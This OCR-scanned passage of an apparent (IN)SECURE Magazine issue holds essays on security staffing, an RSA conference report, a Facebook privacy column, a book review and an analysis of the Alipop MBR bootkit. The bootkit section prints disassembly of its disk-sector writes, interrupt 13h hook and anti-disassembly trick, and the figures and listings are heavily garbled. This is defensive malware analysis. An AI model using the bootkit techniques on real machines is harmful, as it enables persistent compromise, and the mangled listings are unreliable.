interview done for AT&T in November 2007, 
Marcus J. Ranum downplayed the likeliness of 
cyber-terrorism or cyber-war, noting that there 
would be major world market consequences 
to such an attack. He said that an attack like 
that would affect everyone in the world, and 
would only be used in cooperation with some 
sort of ground attack or invasion. 

Personally, I agree with Ranum. The stability 
of the economy of many countries is tied to 
the stability of our financial market. It would be 
suicide for a country like China to crash our 
market. I do, however, think that we need to 
be prepared for anything, especially a cyber 
attack that could cripple our entire country. We 
also have to take into consideration cyber- 
espionage and realize that there are countries 
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that are trying to steal our national secrets by 
hacking into to the computers that hold them. 
There are so many different areas of our na- 
tion that we need to protect, and we currently 
don't have the manpower to do so. 

Defending our "cyber borders" is much more 
difficult that defending our physical ones. It 
takes next to nothing to teach a soldier to fire 
a gun, but in order to protect our cyber inter- 
ests, our defenders need to have years and 
years of training under their belts. Getting into 
and excelling at network and computer secu- 
rity takes as much dedication and practice as 
getting into and excelling at professional 
sports. Cyber security experts have to know 
how to defend the networks from attacks, but 
they also have to be able to take overflowing 



amounts of data and analyze it in order to 
predict an attack that may be coming. 

This is not a career that allows one to just take 
a 12-week course and be ready to defend a 
company or a country - it takes a life-long 
commitment. For years, the government has 
been telling us that there is nothing to worry 
about and that they have everything under 
control. It has created dozens of groups, 
boards, and committees to "regulate" Internet 
and network security - only to realize that 
there is much more work to be done, and that 
higher-level security experts are needed to 
make it happen. It is only now that they are 
admitting that we are vulnerable, and that we 
need to do something about it. 



It seems that every powerful nation and corporation 
is vying for limited talent in the shape of elite 
information security specialists 



Another reason why it has been so hard to 
protect our nation is because the government 
is competing with private companies for quali- 
fied personnel, and they are both drawing 
from an already small pool. Private companies 
have just as much at stake, being that they 
are often contracted by the government to 
carry out different aspects of national security. 

It seems that every powerful nation and corpo- 
ration is vying for limited talent in the shape of 
elite information security specialists. Corpo- 
rate espionage is just as likely as national es- 
pionage, and companies are willing and able 
to pay - often even more than what the gov- 
ernment can offer - in order to protect their 
secrets. 

Also, not only is the U.S. government compet- 
ing with private companies, it is competing 
against every other country in the world. Most 
international superpowers are stockpiling se- 
curity professionals, at times recruiting them 
right out of high school. 

In an article written by Tom Gjelten, he tells a 
story about a student from China who was 
caught hacking into a computer system lo- 
cated in Japan. Rather than being charged as 



a criminal, he was rewarded with more train- 
ing. That particular individual was later caught 
hacking into the Pentagon 
(tinyurl.com/2633rxp). 

Countries all over the world are realizing that 
cyber security is a necessity, and that such 
professionals need to be discovered at a very 
young age and helped to reach their full po- 
tential. 

The future 

But, not all hope is lost. The first step is admit- 
ting that we have a problem. People within the 
industry are talking, and the government is 
listening. We are beginning to target young- 
sters with the skills and the interest needed to 
become the guardians of our cyberspace. We 
are beginning to educate the youth in our 
country, offering courses like Hackid. 

Hackid is a nonprofit conference that offers 
children (aged 5 to 17) a hands-on education 
about things like basic web design, hardware 
and software manipulation, network and appli- 
cations security, and a dozen other topics. 
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The Air Force Association organizes Cyber 
Patriot, a cyber security competition for high 
school students. Similar to its college counter- 
part - the Collegiate Cyber Defense Competi- 
tion - this contest is geared toward setting 
high school students on the road to become 
cyber warriors. 

Those opposed to these types of camps and 
tournaments say that we are encouraging 
children to become hackers and teaching 
them how to be criminals. I say that by offer- 
ing the tournaments we are giving them a 
chance to develop their skills in a legal and 
educational manner. 

Conclusion 

Before tournaments like these became a regu- 
lar occurrence, hackers had to do illegal 
things to get the experience they needed. 
Now there is a legal outlet that will ultimately 
help our country in a time of need. By teach- 
ing children from an early age, we can teach 
them responsibility and awareness. You can 
compare it to a father teaching his child to 



shoot a gun. Yes, that child will know how to 
use a gun, but he (or she) will also be taught 
about the responsibility that goes hand in 
hand with that use. Cyber security is no differ- 
ent. There are always those that will use this 
knowledge for doing bad things, but if we 
teach and promote responsible use of these 
tools, we will do more good than bad. 

We are in the middle of a cyber arms race, 
and we are losing. Fixing the shortage of 
qualified security professionals isn't going to 
be a quick or easy. It is going to take time, 
training, support and patience. 

We, as a society, are going to have to do 
more to encourage our children to take an in- 
terest in technology, and give them the sup- 
port they need to be successful, no matter 
what field the choose. We are going to have to 
encourage children to explore computer net- 
works, in a legal and ethical manner, rather 
then accusing them of being criminals. It is our 
job to give them the opportunity to develop the 
technical skills needed to protect our nation's 
critical infrastructure. 



Blaine Anderson is an information security student at DeVry University in Seattle. He is a member of the Cyber 
Defense Club (which participates in hacker tournaments and challenges), the Student Senate, and Student 
Ambassadors. You can read his security blog at peopleperfectsecurity.blogspot.com, and you can contact him 
at blainevanderson@hotmail.com. 
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If there are constants to every information security conference, they are 
these: threats are up and the job of the average security professional 
becomes more demanding every year. 



At the RSA Conference 2010 held in London 
this week, RSA's CEO Art Coviello illustrated 
the depth of some of the key issues the indus- 
try is dealing with, and acknowledged the 
growing complexity of the job at hand. 

It is estimated that IT professionals spend 
nearly 20% of their time on compliance. Many 
would argue that this takes care of the regula- 
tions, but actually doesn't achieve much be- 
sides giving them an ultimately false sense of 
security. 

"If we don't change our approach, we will be- 
come locked in a vicious cycle of costlier at- 
tacks, generating more public outrage, more 
regulations, compliance and reporting," 
Coviello noted. 

And the end result of these events would be 
less time available for companies to make 
themselves secure while the volume of elabo- 
rate attacks grows by the minute. 



With a soaring volume of Internet traffic and 
the proliferation of increasingly complex sys- 
tems, security professionals are dealing with a 
job that requires evolving security controls and 
adaptive procedures. It may sound easy to 
someone not working in the field, but giving 
the right people access at the exact time when 
it's needed can be quite an endeavor - espe- 
cially in this age of the mobile workforce. 

"What we've ended up with is an overabun- 
dance of point products applied independently 
across the infrastructure: anti-malware, e-mail 
and application encryption, data loss preven- 
tion, etc," says Tom Heiser, RSA's COO. That 
means that the average security professional 
has to manage several products from different 
vendors that need to work together in a hybrid 
environment. And judging by the conversa- 
tions I've been hearing this week, this is the 
starting point of many headaches. 

You can probably guess where RSA is going 
with this talk - a unified solution. 
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: I've never been one of those who believe that 

j there's a one-size-fits-all solution to an or- 

: ganization's security issues. The premise 

j sounds simply to good to be true, and also - 

i could you ever be able to trust one vendor to 

: solve all your problems? However, the mar- 



ketplace shows a growing demand for such ■ 

solutions. The frequent mergers and buyouts j 

of big market players seem to indicate a defi- ■ 

nite shift into a world where we can expect a j 

single solution to be the end of our information ■ 

security problems. j 





Herbert Thompson, Chief Security Strategist 
of People Security, talked about a trend where 
many started moving services like e-mail into 
the cloud despite not being clear on all the is- 
sues. Why the move? Everybody else is doing 
it so it must be a good idea and they expect to 
deal with potential drawbacks later. It appears 
that operational efficiency is inspiring risk 
amnesia. 

What small organizations fail to realize is that 
while their size makes them unlikely targets 
for cyber criminal organizations, upon moving 
their data into a cloud that caters for compa- 
nies their size, they become part of a pool. 
Imagine a company with 20 employees that 
does not want to do its own payroll process- 
ing. Not a compelling target, is it? Now picture 
10,000 companies of 20 employees, all using 
a payroll aggregator. Now, that is something 
worth targeting. 

Despite all the problems, the move to the 
cloud is happening on an ever increasing 
scale with each passing year and baby steps 



forward have been made. The cloud evalua- 
tion framework by EN ISA, for example, allows 
the business consumer to approach a cloud 
provider and get some level of visibility. 

Economically, we need to push forward and 
find solid solutions for a more effective, effi- 
cient and secure cloud. Can this be achieved 
before the bad guys make a serious dent? 
Only time will tell. 

Facebook: The rise of the privacy killer 

Privacy should be a human right, and we 
should be able to see our data, challenge it, 
change it and delete it. Still, we're not in 
charge of our personal information at all, 
and we have only ourselves to blame. 

As the most significant social network in the 
world, with more than 500 million users dis- 
closing a wealth of information on a daily ba- 
sis, Facebook is a dominant repository of per- 
sonal information. Does Facebook care about 
users' privacy? Absolutely not. 
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While discussing Facebook at the RSA Con- 
ference in London, BT Counterpane CTO 
Bruce Schneier was very upfront and said: 
"These CEOs are deliberately killing privacy. 
They have a more valuable market the less 
privacy there is." 

When you think about it, it makes sense for 
them to purposefully erode privacy - it suits 
their business model. How many users are 
complaining? Only a tiny percentage, and 
they're not being loud enough. Most Facebook 
users don't even understand the implications 



of personal data sharing and no one is going 
to warn them until it's too late. 
John Madelin, Director of Professional Serv- 
ices EMEAat Verizon Business agrees. He 
notes that the young always-on generation 
apparently doesn't understand the value of 
data and, even worse, seasoned users are 
making trade-offs just to be in the loop with 
the latest technologies. Increased Facebook 
usage has led to unexpected consequences 
with different types of users using it in different 
ways. Spear phishing has thrived as more 
people opted to open a Facebook account. 




Bruce Schneier on stage for his keynote at RSA Conference Europe 2010. 



One of the biggest gripes by privacy advo- 
cates is the inability for most Facebook users 
to understand how to setup proper privacy 
controls or even the reason why they should 
use them in the first place. Needless to say 
that Facebook is not making it easy for any- 
one, since they are changing the way privacy 
controls are set up quite often. 

"In the end, Facebook will do what's best for 
its customers, and that's not you" said 
Schneier. "People say that Facebook has no 
customer support, but they do, it's just that 



you're not their customer." Naturally, he's right. 
The customers are those placing ads, the data 
hungry wolves looking for advertising so ex- 
quisitely targeted that it was deemed nearly 
impossible just 5 years ago. In this intercon- 
nected world where social media dominates 
the online experience while simultaneously 
dissolving privacy, there is little we can do ex- 
cept avoid using services like Facebook. We 
need regulated privacy laws and controls on a 
higher level in every nation, but is that even 
possible? 



Mirko Zorz is the Editor in Chief of (IN)SECURE Magazine and Help Net Security, 
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Security podcasts 



The real ROI of software security activities 

(www.net-security.org/article. php?id=1 51 1 ) 



At a time when IT budgets are closely examined for cuts that can be lived with, 
a survey among senior executives of 17 companies across the financial serv- 
ices and government sectors reveals whether the benefits of software security 
assurance investments outweigh the drawbacks. In this podcast, Jacob West, 
Director of Security Research at Fortify talks about the real ROI of software se- 
curity activities in the development lifecycle and the results of the survey. 




Developing a secure product lifecycle for Flash content 

(www.net-security.org/article. php?id=1 51 2) 

Peleus Uhley, Platform Security Strategist for Secure Software Engineering at 
Adobe talks about developing a secure product lifecycle for Flash content. By 
enumerating the steps, explaining how to go about executing them, presenting 
tools that can be used and offering his advice on how to avoid typical pitfalls, he 
provides a general checklist that will help any enterprise keep Flash content on 
its website secure. 



Application security: The good, the bad and the ugly 

(www.net-security.org/article. php?id=1 51 5) 




Veracode has tested over 2,900 applications using it cloud-based platform, em- 
ploying static and dynamic analysis (web scanning) and manual penetration test- 
ing to get the answer to that question. In this podcast, Chris Eng, Senior Director 
of Security Research at Veracode and leader of its research lab, talks about the 
good, the bad and the ugly facts that the company's latest State of Software 
Security Report has brought to light. 
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How to sell security to senior management 

(www.net-security.org/article. php?id=1 51 6) 



While companies know they have to invest in IT to do their jobs, IT security al- 
ways ends up looking like an added cost in the eyes of the management. So, 
what are the things you need to learn about the company you're pitching to 
before you get through the door? 

In this podcast, Brian Honan, Principal Consultant at BH Consulting and foun- 
der and head of the Irish CERT, emphasizes key points and warns about what 
to avoid when explaining the need of information security to the management. 



Best practices in approaching vendor risk assessment 

(www.net-security.org/article. php?id=1 51 8) 

When it comes to vendor risk assessment, a one-size-fits-all approach is not 
the way to go. Every vendor you bring into your organization will add its own 
unique set of risks and vulnerabilities, and you should assess them on an indi- 
vidual basis. In this podcast, Garrett Felix, Information Security Officer for 
MediFit talks about the pitfalls typical for the assessment process and how to 
avoid them. 



Large scale study of SSL configurations 

(www.net-security.org/article. php?id=1 505) 

Ivan Ristic is the director of engineering at Qualys and principal author of Mod- 
Security, the open source web application firewall. In this podcast, Ivan talks 
about the Qualys SSL Labs Internet-wide SSL survey and their recent release 
of the raw data from the survey. 

The raw data contains the SSL assessment results of about 850,000 domain 
names. The main file (120 MB compressed, 800 MB uncompressed) is a dump 
of the PostgreSQL database in CSV format. Included in the download is a 
simple PHP script that iterates through all the rows. 
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Authors: Jayson E. Street, Kent Nabors, Brian Baskin I Pages: 360 I Publisher: Syngress I 



Dissecting the Hack: The F0rb1dd3n Network 
approaches the subject of hacking in an inter- 
esting way. 

Part fiction, part reference manual, its target 
audience are people who want to or should 
know more about information security, but 
can't keep their attention onto the subject for 
long enough to learn or can't translate techni- 
cal details into a believable, realistic scenario. 

About the authors 

Jayson E Street is a current member on the 
Board of Directors for the Oklahoma "Infra- 
Gard", VP for ISSA OKC and has been a long- 
time member of the Netragard "SNOsoft" re- 
search team. Former consultant with the FBI 
and Secret Service on attempted network 
breaches, he is a well-known information se- 
curity speaker at a variety of conferences, and 
the co-founder of ExcaliburCon. 

Kent Nabors is a VP of Information Security 
for a multibillion dollar financial institution. His 
background includes security policy develop- 



ment, systems implementation, incident re- 
sponse, and training development. 

Brian Baskin is a digital forensics professional 
employed by CSC and serves as the Deputy 
Lead Technical Engineer with the Defense 
Cyber Investigations Training Academy. He 
devotes much of his time to researching the 
evolving Internet crimes, network protocol 
analysis, and Linux and Unix intrusion re- 
sponses. 

Inside the book 

This book consists of two parts, and both tell 
the same story. 

The first part - called "The F0rb1dd3n Net- 
work" - is a short (some 125 pages long) 
thriller that sees Bob and Leon, two kids with 
plenty of knowledge about the digital world, 
get caught up in a rather realistic case that 
starts as industrial espionage and ends as... 
well, you'll have to discover it for yourself. 

The second part has been titled "Security 
Threats Are Real", and is a companion piece 



www. i nsecu remag .com 



69 



to the first part. In it, tools and techniques 
used by the characters in the fictional part are 
explained, and details, resources and refer- 
ences are given so that the reader can see 
that all these things are possible in the real 
world - and, hopefully, have that realization 
sink in. 

You can read the book in any way you want. 
Fiction first, then the reference manual - or the 
other way around. You can also wade through 
both of them simultaneously. If you're already 
somewhat familiar with concepts such as log 
analysis, wardriving, wireless scanning, 
authentication security, traffic obfuscation and 
the like, you can read the fiction part first and 
then go through the manual after that. 

But, if these words make you draw a blank, I 
would recommend reading the story and stop- 
ping to check each reference when it pops up. 
When that happens, you'll be offered a page 
number that tells you which part of the manual 
to consult to understand what the characters 
are doing or talking about. This way, the hap- 
penings in the story will hopefully keep you 



interested enough to search for the answers in 
the back of the book. 

Final thoughts 

I remember when this book first came out last 
year, and was almost immediately pulled be- 
cause it turned out that the technical editor 
plagiarized most of the STAR section. But, I'm 
glad to see that the authors weren't side- 
tracked by this unfortunate event and pro- 
duced - along with a new technical editor - a 
really good book. 

This book delivers on what it promises to do, 
and is perfect for those who are only starting 
out to learn more about the subject of informa- 
tion security. The references and the explana- 
tions in the STAR section offer technical de- 
tails but they do it in a very comprehensible 
way, which should please the readers. 

As far as experienced security professionals 
go, they can pick up the book as a fun, short 
piece of fiction, but I doubt they will learn 
something they didn't already know. 



Zeljka Zorz is the News Editor for Help Net Security and (IN)SECURE Magazine. 
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Bootkits - a new stage of development 

by Dmitry Oleksyuk 



Bootkits are malicious programs that take control of the computer by infect- 
ing the hard disk's main boot record before the operating system loads. 

The first malicious bootkit ever detected was called Sinowal or Mebroot. It ap- 
peared in 2007 and was rather innovative for that time. But, for whatever rea- 
son, malicious codes developers failed to warm up to this particular infection 
technique, and for three years we have practically seen no new bootkits. 



Several malicious bootkits appeared recently, 
signaling perhaps that this particular tech- 
nique is finally on its way of becoming popular. 

This article reviews new bootkits classes. Par- 
ticular focus has been put on the principle of 
boot code working, because this issue was 
ever only considered in a 2005 report 
(www.blackhat.com/presentations/bh-usa-05/b 
h-us-05-soeder.pdf) about the concept of 
eEye BootRoot technology. 

Technical tools for bootkit analysis 

A bootkit's code is impossible to analyze with 
your typical kernel mode debuggers, since it is 
executed before the control is transferred from 
BIOS to the boot sector. 

The debugging of boot code is possible only 
via virtual machines with executable code de- 
bugging capabilities, and at the moment such 



functionality is available on QEMU and Bochs 
virtual machines. 

Debugging via QEMU 

QEMU — Free open source software. Its func- 
tionality includes emulation of x86, x86-64 and 
other CPUs, and emulation of I/O devices. It is 
possible to debug emulated code with a GDB 
debugger, as it's thoroughly described in 
QEMU documentation (tinyurl.com/2urdt8x). 

It is the author's opinion that it's better to use 
the debugger of IDA Pro disassembler (from 
version 5.4). Setting up a debugger and a vir- 
tual machine is described in IDA Pro docu- 
mentation (tinyurl.com/37ga5r9). 

Let's address some features of boot code 
debugging. 
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c v C:\WIMD0WS\svstem32\cmd.exe - gdb 

D:\GNU\bin>gdb 
GNU gdh 

Copyright 2 004 Free Softuave Foundation, Inc* 

GDB is free software, covered by the GNU General Public License, end wou are 
vie 1c one to change it andxor distribute copies of it under certain conditions. 
Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type **show warranty" for details. 

This GDB was configured as "168£-pc-iiingu32". 

<gdb> target remote 127,0,^,1:1234 

Remote debugging using 127-0.0.1:1234 

OxOOOOfffi in ?? O 

<gdb> break «0x7c00 

Breakpoint 1 at 0x7c00 

<gdb> c 

Cont inuing. 

Breakpoint 1, 0x00007c 00 in ?? O 
<gdh> _ 



□ 




Figure 1 . Using GDB along with QEMU. 



When the debugger is connected to a virtual 
machine and a session is initialized, it is nec- 
essary to set machine breakpoint to 
0000:7C00h address, since boot code starts 



its execution from this address. Then open the 
Breakpoints tab and choose Insert from the 
drop-down menu: 



Breakpoint settings 



Address 



0a7c00 



R Enabled F Hardware breakpoint 
Hard'-vare breakpoint sellings 
Size: |T 

Modes: P Read/Write 
r Write 
P Execute 



Condition 



Actions 
[7 Break 



OK 



F Trace 



Figure 2. Add new breakpoint in IDA Pro. 



Code execution can be continued (F9) after 
adding the breakpoint. 

Note that it is necessary to edit segment set- 
tings manually after execution of breakpoint to 



debug 16-bit code. To do that, open Edit -> 
Segmets -> Edit Segment in the main menu 
and set a 16-bit addressing mode for the cur- 
rent segment: 
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Change segment attributes 



Segment name 
Segment class 
Start address 



MEMORY 



UNK 



0x0 



End address (OxFFEFFFFF 
£° lor DEFAULT 



(* 1 6-bit segment 
C 32-bit segment 



Combination 



(public) 



Alignment (byte 



\? Move adjacent segments 

\~~ Disable addresses 

\? Debugger segment 

\~~ Loader segment 



OK 



Cancel 



Help 



Figure 3. Segment settings in IDA Pro. 
Then you can open the code analysis window and analyze boot sector code. 



X \3\ IDAView-ElP 




X g HexView-6 


X j§j Structures 


X En Enurms 







MORY:7COO 



mov si 

mov s[ 
sti 

push a? 

pop ei 

push a? 

pop df 
cl d 

mov s _ 

mov d _ 

push a? 

push d _ 

mov o 
rep movsb 
retf 



ax, a 

ss s ax 



7COOh 



7ClBh 
6lBh 



bp, 7BI 



oc_7C20: 




v 

]nz 

add 
1 oop 
int 



[bp+0], ch 
short loc_7c2E 
short loc_7C3A 

bp, 10 h 
1 oc_7C20 
18h 



UNKNOWN 



0000 7C00: MEMORY :7C00 



Figure 4. Debugging of boot code in IDA Pro. 
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Debugging via Bochs 

Bochs - Free open source software. Its func- 
tionality includes emulation of x86/x86-64 
CPUs and emulation of I/O devices. 



above-described QEMU. It is advisable to 
have an image of your hard disk with the in- 
stalled OS ready prior to starting Bochs. You 
can make such an image with the QEMU 
emulator. 



Since this system treats each instruction of 
the virtual CPU, it is notable for high emulation 
precision. For the same reason, Bochs' per- 
formance is poorer than that of popular virtual 
machines like VMware and VirtualBox and the 



The Bochs debugger is a standalone applica- 
tion (bochsdbg.exe), which shows a dialog 
window offering the possibility to change vir- 
tual machine settings, restore or save its con- 
figuration. 



Bochs Start Menu 



~ Configuration 



Load 



Save 



Edit 



Reset 



Edit Options 


Logfile 




Log Options 




CPU 




CPU ID 




Memory 




Clock & CMOS 




PCI 




Display & Interface 




Keyboard & Mouse 




Disk & Boot 


zl 


| Serial/ Parallel /USB 



r Simulation^ 



Start 



Restore State 



Quit 



Figure 5. Bochs start menu. 



The starting of the virtual machine is followed 
by the opening of a debugging console with a 
small but sufficient stack of commands, which 
can be listed by using the Help command. 



Enter "lb 0x7c00" to set the breakpoint to the 
beginning of boot code execution and "c" to 
continue code execution. 



U Bochs for Windows - Console 



B 



□0001834543 i [BIOS ] SMBIOS table addr=Ox0O0f bdOO 

□00018369311 [BIOS ] ACPI tables: RSDP addr=0x000f be20 ACPI DATA addr=0x01f f 0000 
size =0x988 

00001840169 i [BIOS ] Firmware waking vector OxlffOOcc 

bO0O1851282i[PCI ] 440FX PMC write to PAM register 59 <TLB Flush> 

□0001852126 i [BIOS ] bios_table_cur_addr : 0x000fbe44 

00001864443 i [BIOS ] ataO-0: PCHS =20/16/63 trans lat ion =none LCHS =20/16/63 

00005744671 i [BIOS ] IDE tine out 

0OO17825O10i[BIOS ] Booting fron 0000:7c 00 

<0> Breakpoint 1, 0x0000000000007c 00 in ?? O 
Next at t =17825071 

<0> [0xOOOO7cO0] 0000 :7c 00 <unk. ctxO: xor ax, ax ; 31c0 

Kbochs:3> u /10 

0O0Q7c00: C >: xor ax, ax ; 31c0 

00007c 02 : C >: nou ds, ax ; 8ed8 

0O0O7cO4: < >: nou es, ax ; 8ec0 

OOO07cO6: C >: nou ss, ax ; 8ed0 

0OOO7c08: < >: nou sp, 0x7c00 ; bc007c 

00 00 7c Ob: < >: nou si, 0x7c00 ; be 007c 

00007cOe: < >: nou di, OxO600 ; bf0006 

0OOO7cll: < >: nou cx, OxOOSO ; b98000 

OOO07cl4: < >: nop ; 90 

O0007cl5: < >: nop ; 90 

<bochs :4> 



xor ax, ax 

nou ds, ax 

nou es, ax 

nou ss, ax 

nou sp, Ox7cO0 

nou si, 0x7c00 

nou di, 0x0600 

nou cx, 0x0080 



31c0 

8ed8 

8ec0 

8ed0 

be 007c 

be 007c 

bf0006 

b98000 

90 

90 



Id 
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Analysis of new bootkits 

Backdoor. Win32.Trup. a (Alipop) 

Alipop appeared around May 2010. Judging 
by the pop-up ads and the Chinese-language 
AdWare, its developers are Chinese. 



Self-defense 

This Trojan doesn't use any techniques to 
avoid proactive defense. However, the source 
code of most of it procedures is secured 
against reverse engineering with an old but 
effective method. It hides some real processor 
instructions inside long chain of opcodes, 
which are considered by the disassembler as 
false instruction. 



.text:0040546[> 
, l_ext:OG4G5473 
.text: 004054 75 
.text :0040147a 
.text: 0040547 E 
.text:Q0405484 
.text:Q0405484 
.text: 00405484 
, 1_ext:Q04054S9 
.text:0040548B 
.text:00405490 



loc_4054M : 



call Fi ndFi rstFi I eA 

cmp eax , OFFFFFFFFh 

jz short loc_40 5492 

jz near ptr I oc_4 054 34+1 

jnz near ptr 1 oc_4054 84+l 



cal I near ptr 424SFlh 

add bh , bh 

adc eax, offset sleep 

jnp short loc_40 545F 



The code presented above is executed in this way: 



. text:0040546D 
. text:00405473 
. text: 00405476 
. text: 00405478 
. cext:0040547E 
. Lext:0040547E 



.text: 00405484 
. Lext:00405465 

.text: 00405485 
. text: 00405485 
. text:00405485 
. text: 0040 548A 
. text:00405490 



loc_4054fl-5: 



cal I 

cmp 

U 

i z 

jnz 



Fi ndFi rstFi I eA 

eax, OFFFFFFFFh 
short loc_405 j 192 
loc_405485 
loc_405485 



db OESh 



push 
cal I 
jmp 



lF4h 
s 1 eep 
short loc_ 



40545F 



As you can see from this listing, a 5-byte call 
instruction at 00405484 doesn't make any 
sense because previous calls always pass 
control to 00405485 where the push instruc- 
tion is located. This method hinders code 
analysis in the IDA disassembler and makes it 
impossible to decompile code with HexRays 
without pre-processing. 

Installer 

The bootkit's installer is an executable file of 
about 24 kB (MD5: 



3f5cff08b83a0a9ad5f8e0973b77a2ac) 5 and 
contains all the other bootkit components. 

Executing the installer leads to the creation 
and launch of the C:\WINDOWS\ali.exe (MD5: 
570e6e5c1 d0c95c5a446f6f62fa90468, about 
17 kB) file with the main operation code of the 
Trojan. 

To maintain auto-loading, the installer writes 
the bootkit's code in the first 40 sectors of the 
HDD: 



"createFi I e" , "\Device\narddi sk0\DR0" , "Desired Access: Generic Read/write, 

Di sposi tion : open" 

"ReadFi le lf p ^DeviceXHarddi sk0\DR0 n , "offset: 0, Length: 20,480, I/O Flags: Non- 
cached" 

n writeFile" s "\Device\narddi skQ\DRQ" , "offset: 0, Length; 20,480, I/O Flags: Non- 
cached" 

"closeFi le n , "\Device\narddi sk0\DR0" 



www. i nsecu remag .com 



75 



view mbr.bin - Far 



! " \ribr - bin 



0000000000: 2E 8C 

Q0QOQOQ01Q: 66 C7 

000000002 0: 60 IE 

0000000030: IE 13 

0000000040: BA 80 

0000000050: 66 91 

0000000060: 83 00 

0000000070: 01 03 

0000000080: 59 E2 

0000000090: 62 C4 

00000000A0: EQ E4 

00QOQ0Q0BQ: 93 20 

Q0QO000QC0: 66 98 

0O0OOO0OD0: CP 3F 

0O0O00O0E0: 60 AE 

0O0OOOO0FO: 60 D9 

0000000100: El 3F 

0000000110: 40 DA 

Q0QOQ0Q120: 98 FD 

Q0QOQ0Q130: 47 57 

0000000140: 0C C8 

0000000150: 54 FF 

0 000000 160: 00 00 

liRfTfH 2THwra?rn 33 



^Jnjxj 



06 00 
06 FC 
2E 8B 
04 CI 
00 CD 
0F 31 
B9 7D 
B9 BC 
E2 62 
00 00 
00 66 
E2 66 
El 00 
4A Fl 
00 C7 
AE 00 
00 27 
DA 4C 
OB B8 
2F 62 
8C 66 
FF 51 
00 00 



06 2E 
7B 00 
IE 13 
E3 06 
13 06 
66 29 
4F 51 
00 72 
66 1A 
00 00 
13 BD 
90 El 
20 FB 
66 16 
00 00 
00 00 
85 C9 
CI 48 
CF 2F 
18 D7 
1C 0E 
62 66 
00 00 
49333 



89 26 
7C 00 
04 81 
8E C3 
68 4A 
C8 66 
2E 8A 
03 73 
C4 00 
00 62 
C8 BC 
F3 40 
00 C7 
62 F0 
C9 08 
00 D9 
AF 60 
0C E7 
EA 57 
40 12 
40 66 
98 54 
00 00 
5 



02 06 
00 2E 
EB 14 
31 DB 

00 CB 
3D 01 
04 08 

01 04 
E2 66 
18 E0 
66 1C 
66 18 
E0 Fl 
2B 62 
CF 24 
E2 88 
66 06 
04 13 

03 62 
08 57 
50 00 
10 66 
00 00 

I 6ISRE 



Uin 



2E 8C 
OF B2 
00 80 
B8 28 
68 00 
00 00 
CO 74 
D2 C8 
3A 3F 
C4 00 
3E 40 
3C 40 
EB 00 
20 60 
47 BO 
62 BO 
4B 00 
9C 88 
66 18 
AE 60 
20 00 
16 70 
00 00 



16 04 
26 FC 
E3 FC 
02 B9 
00 07 
00 7E 
12 72 
2E 88 
00 62 
6E 00 
E2 66 
20 00 
C4 9B 
62 E8 
08 CF 
10 C9 
08 CF 
1C 1C 
D3 OF 
66 13 
00 70 
D9 AC 
00 00 



512 



06 2E 
7B 66 
2E 89 
01 00 
0F 31 
24 BE 

03 73 

04 46 
66 18 
62 C8 
90 El 
00 E2 
00 20 
60 00 
20 47 
E2 FF 
24 57 
IE 90 
58 6F 
0C E8 
62 7C 
20 00 
00 00 
83EM 



Col 0 



Ox 



.0* *.x&Q*.Ol+*. 

fp*u< ! .« 2 &iKf 
l A.<A!!4_eH _aix.y. 
A!!*Aa4ZAlU,CQl® 
I!!*hJ Eh -ftl 
f l ttlf>Ef=0 ™$_ 
£ l>OQ.S*BAttr¥s 
0W1JS rVs©*OE. A *F 
¥aabf-»fi af:? bft 
bA btafi n bE 

aa f !!JlESSF'->eaf_a 
" af_a60ft<e a 
f~a u pane A> 
I?Jnflbd+b l be l 
l r C £DI$G°DI G 
l Ur Ua A b°^av 
a? 1 -£_ l f*K BI$W 
0UULAH?f*!!o A '-'-A_ 
™i>ff,I/eUVbf TOaXo 
GH/btxPtBUr l f !!9e 
9E0f --flPf P pb ! 
T ijyQbf ~T>f IpU-. 



Figure 7. Infected MBR. 



The bootkit's code is called at the next system 
launch. 

Executable code 

First of all, the bootkit's executable code re- 
serves 20 kB in the base memory. For this 



purpose it decreases base memory volume in 
BIOS variable at 0040h:0013h. 

The bootkit's components are fetched from 
the first 40 HDD sectors into a reserved area 
with function 2 of interrupt 13h. Then control is 
being transferred to fetched code. 



seg000:00lF 


pushad 




segOOOrGQZl 


push 


ds 


segODO:GD22 


mov 


bx F word ptr cs:0413h 


seg000;G027 


sub 


bx p I4h ; reserve ZO kB of the memory 


segOOOrGOZB 


and 


bl p OFCh 


segOOO;G02E 


mov 


word ptr cs:0413h P bx 


segOOQ;GQ33 


shl 


bx P 6 ; calculate line address of reserved 


sector 






segODQrO03£ 


mov 


es p bx 
bx F bx 


segOOOrG03B 


xor 


segOOQ:QQ3A 


rnov 


ax r 2Z8h ; Read first 40 sectors 


segQD0:G03D 


mov 


CXp 1 


segOOQ:GQ40 


rnov 


dx P SOh 
13h 


seg000:0043 


i nt 


segOOO:0045 


push 


es 


EegO0O:O0-ie 


push 


4 Ah ; transfer control to fetched code by 4 ah 


offset 






segQ00:G049 


retf 





Read code and data from the 83h offset is ci- 
phered with a reversible operation ROR, and 
then deciphering is performed. 

After deciphering the bootkit intercepts BIOS 
13h interrupt and makes it possible to control 



read operations at the first stages of system 
launch. 

Finally, the original OS loader is getting called, 
which is saved by the bootkit's installer in sec- 
tor 39. 
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segOOO:OQ83 

segODOrOQSB 

hand ler 

segO0O:OO8D 

segOOO:0097 

address 

segODQ;G09E 

selector 

segOOOrOOA^ 

seg000:00A6 

segODOrGQAB 



mov eax, dword pi_r es:004ch 

mov dword ptr csiDQFlh, eax 

a pi d dword ptr es:QQ4ch, 0 

or word ptr esiOCMClr, 0E6h 

ntov word ptr es:004Eh, cs 

xor ebx, ebx 

ntov bx , c s 

shl ebx, -1 



save ori gi na I i nl_ Uh 

set hew handler 
set hew hand I er 



segOOO: 
segOOO: 
segOOO: 
segOOO: 
segOOO: 
segOOO: 
segOOO: 
segOOO: 
segOOO: 
segOOO: 
segOOO: 
segOOO: 
code 



00 C 5 
OQCB 
00C9 
OOCA 
OOCD 
0000 
0001 
0003 
0004 
0006 
OOOC 
00E1 



rnov 
push 
pop 
mov 
ntov 
eld 

rep fnovsb 



di , 
cs 
ds 

si , 
cx , 



pop 
popad 
I ss 
ntov 
jmp 



ds 

sp P 
es P 
far 



7C00h 



4C0Oh 

200h 



copy original boot sector to 7c00h 



dword ptr es:060Zh ; Restore sp 
word ptr esr0600h ; Restore es 
ptr 0:7<l00h ; Execute original 



boot 



Hooking of 13h interrupt is performed to mod- 
ify the code of the OSLOADER.EXE module 
during its reading from system partition. 
OSLOADER.EXE is a part of the NTLDR 
module, and is executed in protected mode. 



The goal of this modification is to execute the 
bootkit's code in protected mode, too. 
OSLOADER.EXE code (subject to modifica- 
